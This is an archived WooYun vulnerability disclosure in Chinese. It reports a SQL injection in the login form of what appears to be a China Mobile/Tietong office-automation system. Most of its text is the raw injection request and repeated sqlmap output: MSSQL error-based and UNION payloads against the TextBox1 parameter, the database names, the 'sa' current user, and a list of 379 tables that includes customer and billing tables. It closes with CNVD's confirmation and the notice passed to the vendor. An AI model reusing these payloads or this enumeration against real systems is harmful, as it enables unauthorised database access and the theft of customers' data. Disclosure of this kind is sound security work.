乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
POST / HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/Cookie: ASP.NET_SessionId=ycr04ype43y1v3kayy0nqhx4; CheckCode=6429Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 570__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA%2BNjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEdAAY6lvILm%2FT9OghmY%2Bg2x7u6ESCFkFW%2FRuhzY1oLb%2FNUVB2nXP6dhZn6mKtmTGNHd3PuG%2FvoEfy%2B7uIzi2Rvx6fV11XHUpccT%2FZvHXO%2B483nuhbGvIhjQjqbL%2FFLM6nbbYG%2BDW6mLBcX0CZ0ALS%2FQ7PqQ40CsyMX5J%2FqK3uzIbOwdQ%3D%3D&TextBox1=123'*&TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31
参数:TextBox1
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' AND 4426=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4426=4426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)))-- Yhkr&TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31 Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(116)+CHAR(65)+CHAR(114)+CHAR(109)+CHAR(89)+CHAR(113)+CHAR(102)+CHAR(83)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)-- &TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'CTT_OA'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' AND 4426=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4426=4426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)))-- Yhkr&TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31 Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(116)+CHAR(65)+CHAR(114)+CHAR(109)+CHAR(89)+CHAR(113)+CHAR(102)+CHAR(83)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)-- &TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [8]:[*] CTT_OA[*] CTT_TEST[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdbsqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' AND 4426=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4426=4426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)))-- Yhkr&TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31 Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(116)+CHAR(65)+CHAR(114)+CHAR(109)+CHAR(89)+CHAR(113)+CHAR(102)+CHAR(83)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)-- &TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current user: 'sa'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' AND 4426=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4426=4426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)))-- Yhkr&TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31 Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NTU5MzYwMDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBRBJbWFnZUJ1dHRvblpodUNlnwCVaKUA+NjbkVRtvH6amWN7qrpka7H9f7EgjeZ7lEk=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAY6lvILm/T9OghmY+g2x7u6ESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PuG/voEfy+7uIzi2Rvx6fV11XHUpccT/ZvHXO+483nuhbGvIhjQjqbL/FLM6nbbYG+DW6mLBcX0CZ0ALS/Q7PqQ40CsyMX5J/qK3uzIbOwdQ==&TextBox1=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(116)+CHAR(65)+CHAR(114)+CHAR(109)+CHAR(89)+CHAR(113)+CHAR(102)+CHAR(83)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)-- &TextBox2=123&TextBox3=6429&ImageButtonLogin.x=93&ImageButtonLogin.y=31---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: CTT_OA[379 tables]+---------------------+| 114 || AllHuiFangs || IMEP装维 || LocalCMCC || Log || PlanTasks || SelectLists || Sheet1$ || SolarData || TroubleCurrent || V_客户资料 || '2013-12-18宽带在网用户明细表$' || allnetusers(无效用户) || allnetusers(无效用户) || answerImportantFile || answerTask || answerTaskRequest || answerWorkOrder || birthday || c_合同 || c_合同修改记录 || c_合同分类项 || c_合同审批 || c_合同描述表 || c_合同附件 || com1 || excel || iMEPs || j_task_list_det || j_task_list_det || j_task_list_s || j_task_log_det || j_task_log_det || j_task_plan_det || j_task_plan_det || newCallBoard || newImportantFile || newJMailAnswer || newJMailAnswer || newJReportAnswer || newJReportAnswer || newTask || newWorkOrder || report_column || report_data || report_title || systempram || taskRequest || ttKeys || ttTokens || uploadFile || users || yyt || 业务标识 || 业务种类 || 业务类型 || 产品分库 || 产品库存 || 产品礼品 || 产品销售 || 产品销售统计 || 优惠类别 || 保有用户 || 全国行政编码 || 公话 || 公话充值明细 || 出帐费用情况 || 列表 || 发展角色 || 发电机 || 发电记录 || 可执行文本 || 员工台账 || 固话端口 || 增值业务标识 || 套餐属性 || 套餐类别 || 实物列表 || 审批细节 || 审批项 || 审批项节点 || 客户业务 || 客户区域 || 客户行业 || 客户街道 || 客户资料 || 宽带充值明细 || 宽带回访结果 || 宽带客户经理 || 宽带用户板 || 宽带续费基数 || 宽带老用户 || 宽带设备型号 || 宿舍名单 || 就餐预约 || 房屋合同 || 投诉分类 || 投诉回复 || 投诉工单 || 投诉模板 || 投诉类型 || 投诉进程 || 接入网 || 收费项目 || 文件类型 || 施工单 || 日报卡类收入201306 || 日报卡类收入201307 || 日报卡类收入201308 || 日报卡类收入201309 || 日报卡类收入201310 || 日报卡类收入201311 || 日报卡类收入201312 || 日报卡类收入201401 || 日报卡类收入201402 || 日报卡类收入201403 || 日报卡类收入201404 || 日报卡类收入201405 || 日报卡类收入201406 || 日报卡类收入201407 || 日报卡类收入201408 || 日报卡类收入201409 || 日报卡类收入201410 || 日报卡类收入201411 || 日报卡类收入201412 || 日报卡类收入201501 || 日报卡类收入201503 || 日报卡类收入201507 || 日报卡类收入201510 || 日报合建宽带新装201306 || 日报合建宽带新装201307 || 日报合建宽带新装201308 || 日报合建宽带新装201309 || 日报合建宽带新装201310 || 日报合建宽带新装201311 || 日报合建宽带新装201312 || 日报合建宽带新装201401 || 日报合建宽带新装201402 || 日报合建宽带新装201403 || 日报合建宽带新装201404 || 日报合建宽带新装201405 || 日报合建宽带新装201406 || 日报合建宽带新装201407 || 日报合建宽带新装201408 || 日报合建宽带新装201409 || 日报合建宽带新装201410 || 日报合建宽带新装201411 || 日报合建宽带新装201412 || 日报合建宽带新装201501 || 日报合建宽带新装201503 || 日报合建宽带新装201507 || 日报合建宽带新装201510 || 日报后付费收入201306 || 日报后付费收入201307 || 日报后付费收入201308 || 日报后付费收入201309 || 日报后付费收入201310 || 日报后付费收入201311 || 日报后付费收入201312 || 日报后付费收入201401 || 日报后付费收入201402 || 日报后付费收入201403 || 日报后付费收入201404 || 日报后付费收入201405 || 日报后付费收入201406 || 日报后付费收入201407 || 日报后付费收入201408 || 日报后付费收入201409 || 日报后付费收入201410 || 日报后付费收入201411 || 日报后付费收入201412 || 日报后付费收入201501 || 日报后付费收入201503 || 日报后付费收入201507 || 日报后付费收入201510 || 日报固话新装201306 || 日报固话新装201307 || 日报固话新装201308 || 日报固话新装201309 || 日报固话新装201310 || 日报固话新装201311 || 日报固话新装201312 || 日报固话新装201401 || 日报固话新装201402 || 日报固话新装201403 || 日报固话新装201404 || 日报固话新装201405 || 日报固话新装201406 || 日报固话新装201407 || 日报固话新装201408 || 日报固话新装201409 || 日报固话新装201410 || 日报固话新装201411 || 日报固话新装201412 || 日报固话新装201501 || 日报固话新装201503 || 日报固话新装201507 || 日报固话新装201510 || 日报现金流201306 || 日报现金流201307 || 日报现金流201308 || 日报现金流201309 || 日报现金流201310 || 日报现金流201311 || 日报现金流201312 || 日报现金流201401 || 日报现金流201402 || 日报现金流201403 || 日报现金流201404 || 日报现金流201405 || 日报现金流201406 || 日报现金流201407 || 日报现金流201408 || 日报现金流201409 || 日报现金流201410 || 日报现金流201411 || 日报现金流201412 || 日报现金流201501 || 日报现金流201503 || 日报现金流201507 || 日报现金流201510 || 日报移动光宽带新装201306 || 日报移动光宽带新装201307 || 日报移动光宽带新装201308 || 日报移动光宽带新装201309 || 日报移动光宽带新装201310 || 日报移动光宽带新装201311 || 日报移动光宽带新装201312 || 日报移动光宽带新装201401 || 日报移动光宽带新装201402 || 日报移动光宽带新装201403 || 日报移动光宽带新装201404 || 日报移动光宽带新装201405 || 日报移动光宽带新装201406 || 日报移动光宽带新装201407 || 日报移动光宽带新装201408 || 日报移动光宽带新装201409 || 日报移动光宽带新装201410 || 日报移动光宽带新装201411 || 日报移动光宽带新装201412 || 日报移动光宽带新装201501 || 日报移动光宽带新装201503 || 日报移动光宽带新装201507 || 日报移动光宽带新装201510 || 日报表 || 日报表分类 || 日报表明细 || 日报铁通宽带新装201306 || 日报铁通宽带新装201307 || 日报铁通宽带新装201308 || 日报铁通宽带新装201309 || 日报铁通宽带新装201310 || 日报铁通宽带新装201311 || 日报铁通宽带新装201312 || 日报铁通宽带新装201401 || 日报铁通宽带新装201402 || 日报铁通宽带新装201403 || 日报铁通宽带新装201404 || 日报铁通宽带新装201405 || 日报铁通宽带新装201406 || 日报铁通宽带新装201407 || 日报铁通宽带新装201408 || 日报铁通宽带新装201409 || 日报铁通宽带新装201410 || 日报铁通宽带新装201411 || 日报铁通宽带新装201412 || 日报铁通宽带新装201501 || 日报铁通宽带新装201503 || 日报铁通宽带新装201507 || 日报铁通宽带新装201510 || 日报铁通宽带新装收入201306 || 日报铁通宽带新装收入201307 || 日报铁通宽带新装收入201308 || 日报铁通宽带新装收入201309 || 日报铁通宽带新装收入201310 || 日报铁通宽带新装收入201311 || 日报铁通宽带新装收入201312 || 日报铁通宽带新装收入201401 || 日报铁通宽带新装收入201402 || 日报铁通宽带新装收入201403 || 日报铁通宽带新装收入201404 || 日报铁通宽带新装收入201405 || 日报铁通宽带新装收入201406 || 日报铁通宽带新装收入201407 || 日报铁通宽带新装收入201408 || 日报铁通宽带新装收入201409 || 日报铁通宽带新装收入201410 || 日报铁通宽带新装收入201411 || 日报铁通宽带新装收入201412 || 日报铁通宽带新装收入201501 || 日报铁通宽带新装收入201503 || 日报铁通宽带新装收入201507 || 日报铁通宽带新装收入201510 || 日报铁通宽带续费201306 || 日报铁通宽带续费201307 || 日报铁通宽带续费201308 || 日报铁通宽带续费201309 || 日报铁通宽带续费201310 || 日报铁通宽带续费201311 || 日报铁通宽带续费201312 || 日报铁通宽带续费201401 || 日报铁通宽带续费201402 || 日报铁通宽带续费201403 || 日报铁通宽带续费201404 || 日报铁通宽带续费201405 || 日报铁通宽带续费201406 || 日报铁通宽带续费201407 || 日报铁通宽带续费201408 || 日报铁通宽带续费201409 || 日报铁通宽带续费201410 || 日报铁通宽带续费201411 || 日报铁通宽带续费201412 || 日报铁通宽带续费201501 || 日报铁通宽带续费201503 || 日报铁通宽带续费201507 || 日报铁通宽带续费201510 || 日报铁通宽带续费收入201306 || 日报铁通宽带续费收入201307 || 日报铁通宽带续费收入201308 || 日报铁通宽带续费收入201309 || 日报铁通宽带续费收入201310 || 日报铁通宽带续费收入201311 || 日报铁通宽带续费收入201312 || 日报铁通宽带续费收入201401 || 日报铁通宽带续费收入201402 || 日报铁通宽带续费收入201403 || 日报铁通宽带续费收入201404 || 日报铁通宽带续费收入201405 || 日报铁通宽带续费收入201406 || 日报铁通宽带续费收入201407 || 日报铁通宽带续费收入201408 || 日报铁通宽带续费收入201409 || 日报铁通宽带续费收入201410 || 日报铁通宽带续费收入201411 || 日报铁通宽带续费收入201412 || 日报铁通宽带续费收入201501 || 日报铁通宽带续费收入201503 || 日报铁通宽带续费收入201507 || 日报铁通宽带续费收入201510 || 机器码归属部门 || 权限 || 欠费帐户统计列表 || 浏览记录 || 用户组 || 用户资料 || 短信息 || 短消息 || 码号归属 || 移动代理 || 网厅工单 || 职业技能 || 职位 || 自定义套餐用户 || 营业厅受理费用 || 虚拟网列表 || 虚拟网工单 || 虚拟网用户 || 行政区划代码 || 装维工单 || 角色 || 调帐 || 费用报销 || 费用管理 || 资费套餐 || 赠品流水帐 || 赠品领用 || 车辆台帐 || 转发 || 轻固充值明细 || 轻松固话 || 轻松固话终端号 || 部门 || 销账费用明细_tmp || 销账费用明细_tmp || 限制权限 || 预付费充值 || 预付费充值日志 || 预付费充值现充 || 驾驶员 |+---------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-23 16:35
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无
